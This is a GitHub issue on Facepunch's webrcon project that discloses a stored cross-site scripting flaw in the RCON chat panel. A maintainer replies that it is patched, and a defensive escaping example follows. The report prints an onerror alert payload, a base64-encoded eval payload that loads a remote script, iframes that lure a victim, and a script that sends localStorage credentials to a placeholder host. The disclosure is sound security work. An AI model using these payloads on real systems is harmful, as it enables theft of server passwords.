Facepunch / webrcon

Game server rcon, using websockets
MIT License

Cross-Site Scripting Vulnerability on Administrator Chat Message, Exploitable to Steal Server Credentials #32

Closed samwcyo closed 3 years ago

samwcyo commented 3 years ago

Summary

There is a cross-site scripting vulnerability when loading messages sent from the RCON panel. An attacker can deploy a Rust server, add the poisoned XSS message to the Rust chat, then trick a victim into automatically logging in and loading in the poisoned message which has the capability to retrieve the stored server credentials in the "localStorage" object.

Steps to Reproduce - alert prompt

  1. Login to your own rust server
  2. Browse to "http://facepunch.github.io/webrcon/#/YOUR_HOST/chat"
  3. Send the following message in chat from the RCON console...
<img/src='x'/onerror='alert(1)'/>
  4. Observe the alert prompt. Additionally, refresh the page and observe the alert prompt

Steps to Reproduce - exfiltrating password

An attacker could host the following script on their HTTP server...

steal=btoa(JSON.stringify(localStorage))
var xhr = new XMLHttpRequest();
xhr.open('GET', 'http://YOUR_HOST/?x='+steal, true);
xhr.send();

Which would be stored on the service by sending the following message with the script source pointed towards the attacker controlled script...

<img src=x id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8vWU9VUkhPU1QiO2RvY3VtZW50LmJvZHkuYXBwZW5kQ2hpbGQoYSk7 onerror=eval(atob(this.id))>

Then, once the message has been sent to their own server, tricking a victim into loading the payload via the following attacker controlled page:

<iframe src="http://facepunch.github.io/webrcon/#/YOUR_HOST/info?password=password"></iframe>
<iframe src="http://facepunch.github.io/webrcon/#/YOUR_HOST/chat"></iframe>

Which would exfiltrate the password by sending an HTTP request like this:

GET /?x=eyJwcmV2aW91c0Nvbm5lY3Rpb25zIjoiW3tcIkFkZHJlc3NcIjpcIllPVVJfU0VSVkVSXCIsXCJQYXNzd29yZFwiOlwiWU9VUl9QQVNTV09SRCFcIixcImRhdGVcIjpcIjIwMjEtMDItMjBUMDY6MjU6MDEuNDAxWlwifV0ifQ== HTTP/1.1

Impact

An attacker could use this to exfiltrate RCON passwords of anyone using the Facepunch RCON service.
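The defensive side of the report above, as an added example that is not the webrcon project's own code: chat message fields are escaped before they reach the DOM, and rendered output or raw messages carrying markup are flagged for operator review. The `{ Username, Message }` message shape and the `div`/`b` template are assumptions for the illustration, not the panel's real structure.

```javascript
// Added example, not code from the webrcon project. Treat RCON chat fields as
// text, never as markup, and flag messages that carry markup for review.
// DOM-free on purpose so it runs under Node; in the browser the equivalent
// is assigning message text via textContent rather than innerHTML.

const HTML_ESCAPES = {
  '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;',
};

// Escape the five characters that can change HTML context.
function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Vulnerable pattern: untrusted fields concatenated straight into markup
// (assumed message shape { Username, Message }).
function renderChatLineUnsafe(msg) {
  return `<div class="chat"><b>${msg.Username}</b>: ${msg.Message}</div>`;
}

// Hardened pattern: every untrusted field is escaped before concatenation.
function renderChatLineSafe(msg) {
  return `<div class="chat"><b>${escapeHtml(msg.Username)}</b>: ${escapeHtml(msg.Message)}</div>`;
}

// Tag names the template itself emits; any other tag in the output is injected.
const TEMPLATE_TAGS = new Set(['div', 'b']);

// Scan rendered output for element tags the template never produced.
function findInjectedTags(html) {
  const found = [];
  const tagRe = /<\/?([a-zA-Z][a-zA-Z0-9]*)/g;
  let m;
  while ((m = tagRe.exec(html)) !== null) {
    const name = m[1].toLowerCase();
    if (!TEMPLATE_TAGS.has(name)) found.push(name);
  }
  return found;
}

// Flag raw messages containing tags or inline event handlers, for log review.
function looksLikeMarkup(message) {
  return /<[a-zA-Z!\/]/.test(message) || /\bon[a-z]+\s*=/i.test(message);
}

// Constructed sample messages; the first is the proof-of-concept from the report.
const SAMPLE_MESSAGES = [
  { Username: 'SERVER', Message: "<img/src='x'/onerror='alert(1)'/>" },
  { Username: 'player<1>', Message: 'gg & thanks' },
];
```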

garrynewman commented 3 years ago

Hey - thanks for the write up - I just pushed something that should fix this.

samwcyo commented 3 years ago

Looks fixed to me :) thanks for the quick patch